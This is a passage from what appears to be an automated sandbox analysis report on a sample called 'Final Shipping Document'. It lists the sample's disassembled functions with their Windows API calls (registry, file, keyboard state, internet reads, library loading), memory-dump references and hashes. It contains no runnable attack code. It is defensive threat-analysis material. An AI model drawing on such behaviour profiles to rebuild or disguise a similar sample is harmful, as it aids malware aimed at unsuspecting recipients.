                                                              • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                            • _free.LIBCMT ref: 00BDBD4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID:
                                                            • API String ID: 1286116820-0
                                                            • Opcode ID: a9e524c4932877bc3fd2c32eca5ea61eef7720339d9b3e97fd83efb2e22571a5
                                                            • Instruction ID: 42f9f33a9b06a000ba71df321c878b18575ea0397b4816ec2e255f654a7d8d76
                                                            • Opcode Fuzzy Hash: a9e524c4932877bc3fd2c32eca5ea61eef7720339d9b3e97fd83efb2e22571a5
                                                            • Instruction Fuzzy Hash: 7B518371900209EFCB14EF699C81EAEF7F8EB44360B1542ABE554D73A1FB709E419B50
                                                            Function 00C0E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                              • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                              • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C0E473
                                                            • MoveFileW.KERNEL32(?,?), ref: 00C0E4AC
                                                            • _wcslen.LIBCMT ref: 00C0E5EB
                                                            • _wcslen.LIBCMT ref: 00C0E603
                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C0E650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                            • String ID:
                                                            • API String ID: 3183298772-0
                                                            • Opcode ID: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                            • Instruction ID: 3dd351c89d4c3fda18f6d7394e5d80f4f6795570a7ccf22735d4cf112026ac24
                                                            • Opcode Fuzzy Hash: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                            • Instruction Fuzzy Hash: 405161B24483459BC724EB90DC81ADFB3ECAF85340F00491EF69993191EF75A688CB66
                                                            Function 00C2B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                              • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C2B6AE,?,?), ref: 00C2C9B5
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                              • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BAA5
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C2BB00
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C2BB63
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00C2BBA6
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C2BBB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 826366716-0
                                                            • Opcode ID: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                            • Instruction ID: 23510d5d3c1d72c88e8ddd57f4af192083a82c15327f6b1d5a28919e3149d27c
                                                            • Opcode Fuzzy Hash: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                            • Instruction Fuzzy Hash: 1361B031208241EFC314DF14D490E2ABBE5FF85348F1485ACF49A8B6A2DB31ED45DB92
                                                            Function 00C08BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00C08BCD
                                                            • VariantClear.OLEAUT32 ref: 00C08C3E
                                                            • VariantClear.OLEAUT32 ref: 00C08C9D
                                                            • VariantClear.OLEAUT32(?), ref: 00C08D10
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C08D3B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType
                                                            • String ID:
                                                            • API String ID: 4136290138-0
                                                            • Opcode ID: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                            • Instruction ID: ae8777d73348bca973f0728e8f41807a3f53e6a7dbdae283cb2d5bd2c8c7449b
                                                            • Opcode Fuzzy Hash: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                            • Instruction Fuzzy Hash: CE517AB5A1021AEFCB10CF68C884AAAB7F8FF89310B158559F955EB350E730E911CF90
                                                            Function 00C18AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C18BAE
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C18BDA
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C18C32
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C18C57
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C18C5F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: c8e50d9668753fd97ff51ccb87ee890e3d665482aa9c2a50ce6d3cc55d08348d
                                                            • Instruction ID: 7d97ba9bc8e91108835be120f67afc7b3d8d6b00bc4f00bf4882856449132acc
                                                            • Opcode Fuzzy Hash: c8e50d9668753fd97ff51ccb87ee890e3d665482aa9c2a50ce6d3cc55d08348d
                                                            • Instruction Fuzzy Hash: 21515A35A042159FCB00DF64C891AAEBBF5FF4A314F088099E849AB362CB31ED55DF90
                                                            Function 00C28EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C28F40
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C28FD0
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C28FEC
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C29032
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C29052
                                                              • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C11043,?,7529E610), ref: 00BBF6E6
                                                              • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00BFFA64,00000000,00000000,?,?,00C11043,?,7529E610,?,00BFFA64), ref: 00BBF70D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                            • String ID:
                                                            • API String ID: 666041331-0
                                                            • Opcode ID: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                            • Instruction ID: 4bbdfd4c965fbb281edf9cc7e3e766bce25869a58a358e86b7ab0463222b1342
                                                            • Opcode Fuzzy Hash: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                            • Instruction Fuzzy Hash: B8514935A05215DFC711DF58C4949ADBBF1FF49314F0880A9E81AAB762DB31EE85CB90
                                                            Function 00C36B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C36C33
                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00C36C4A
                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C36C73
                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C1AB79,00000000,00000000), ref: 00C36C98
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C36CC7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MessageSendShow
                                                            • String ID:
                                                            • API String ID: 3688381893-0
                                                            • Opcode ID: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                            • Instruction ID: d29d0175dcbba94f2fcffd60ce5d4dec0e581a295c721dae83350f637d0a5083
                                                            • Opcode Fuzzy Hash: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                            • Instruction Fuzzy Hash: 98410A35624104BFDB24CF38DC95FA9BBA4EB09350F149224FCA5A72E0C371EE41DA50
                                                            Function 00BD2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: cdf5de6dafb319c2e987115b762df6a9acc9dae5099f6f373bbbc1c71dc60a4a
                                                            • Instruction ID: 3eb8defb9e83ea9b3ebb098a7f3487898da65327011d300195c3a460de0d47e5
                                                            • Opcode Fuzzy Hash: cdf5de6dafb319c2e987115b762df6a9acc9dae5099f6f373bbbc1c71dc60a4a
                                                            • Instruction Fuzzy Hash: 3F41A136A00240AFCB24DF78C881A6DF7E5EF99314B1585AAE515EB351E631AD01DB80
                                                            Function 00BB912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00BB9141
                                                            • ScreenToClient.USER32(00000000,?), ref: 00BB915E
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00BB9183
                                                            • GetAsyncKeyState.USER32(00000002), ref: 00BB919D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                            • Instruction ID: d52a739c84363192753db4955e1c1177b5bef627ae30259f41406995928ef0b8
                                                            • Opcode Fuzzy Hash: 91f7dd4fb007af2e3c75b55788f0ea0c84328fd89783e3d585206559473e373d
                                                            • Instruction Fuzzy Hash: 33415F7190850AFBDF159F68C884BFEB7B4FF05320F208299E525B7290CB745A58EB91
                                                            Function 00C13874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetInputState.USER32 ref: 00C138CB
                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C13922
                                                            • TranslateMessage.USER32(?), ref: 00C1394B
                                                            • DispatchMessageW.USER32(?), ref: 00C13955
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                            • String ID:
                                                            • API String ID: 2256411358-0
                                                            • Opcode ID: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                            • Instruction ID: 92a4780192c8a45003f5b09d9717ee20feac7750b2f0b35fc9d39e12af9ada62
                                                            • Opcode Fuzzy Hash: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                            • Instruction Fuzzy Hash: 2F31A6705043C19EEB35CB359849BFA3BA8AB07318F08456AE876961E0E3B497C5EB51
                                                            Function 00C1CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00C1CF38
                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00C1CF6F
                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFB4
                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFC8
                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFF2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                            • String ID:
                                                            • API String ID: 3191363074-0
                                                            • Opcode ID: b34a1e159e6395d195579aa997c945f2d33980d141dd18dcd3f3b5a6447db283
                                                            • Instruction ID: 4e854cecbdbcb5af1774b1c20bf106fdfcec5a133fa0695001a9408a8a05246c
                                                            • Opcode Fuzzy Hash: b34a1e159e6395d195579aa997c945f2d33980d141dd18dcd3f3b5a6447db283
                                                            • Instruction Fuzzy Hash: 88313A71540205AFDB20DFA5C8C4AEFBBF9EB16350B10446EF526E2150DB30EE82AB60
                                                            Function 00C01901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00C01915
                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C019C1
                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00C019C9
                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C019DA
                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C019E2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 23a914c890bd8451dfeaa0e07a0df7973612266432dd9ffa1ee9b3d1eeb4ea02
                                                            • Instruction ID: bacca62646479a4df96ab9028fc278cd09d227cb580f4cfc0225b976a35d5b4e
                                                            • Opcode Fuzzy Hash: 23a914c890bd8451dfeaa0e07a0df7973612266432dd9ffa1ee9b3d1eeb4ea02
                                                            • Instruction Fuzzy Hash: B331C071A10219EFCB00CFA8CD99BDE7BB5EB05315F144229FD21A72D1C7709A54DB90
                                                            Function 00C35706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C35745
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C3579D
                                                            • _wcslen.LIBCMT ref: 00C357AF
                                                            • _wcslen.LIBCMT ref: 00C357BA
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen
                                                            • String ID:
                                                            • API String ID: 763830540-0
                                                            • Opcode ID: 616cf8251dba92bae86e24b47501a4b3834e3f5340f280b4d31718363ecf42fa
                                                            • Instruction ID: 784cf78b486569f930907c4177b2994d61c09e912a0b424644070fcbcbbf6272
                                                            • Opcode Fuzzy Hash: 616cf8251dba92bae86e24b47501a4b3834e3f5340f280b4d31718363ecf42fa
                                                            • Instruction Fuzzy Hash: 082180759246189ADB209FA5CC85BEE7BB8FF05724F108256F929EA1C0D7708A85CF50
                                                            Function 00C20930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 00C20951
                                                            • GetForegroundWindow.USER32 ref: 00C20968
                                                            • GetDC.USER32(00000000), ref: 00C209A4
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00C209B0
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00C209E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: 11afa4819ab2a5feb5c8e3c2ac6b33718172633854ed1a951b2291ff4566d004
                                                            • Instruction ID: 0e6bf201c946550ba1dbea22d6765c8ba7da533e814003981ef01eb4b12ea977
                                                            • Opcode Fuzzy Hash: 11afa4819ab2a5feb5c8e3c2ac6b33718172633854ed1a951b2291ff4566d004
                                                            • Instruction Fuzzy Hash: D821CD35A00214AFD704EF65D889BAEBBF9EF49300F048069F85AA7762CB30AC44DB50
                                                            Function 00BDCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00BDCDC6
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDCDE9
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDCE0F
                                                            • _free.LIBCMT ref: 00BDCE22
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDCE31
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
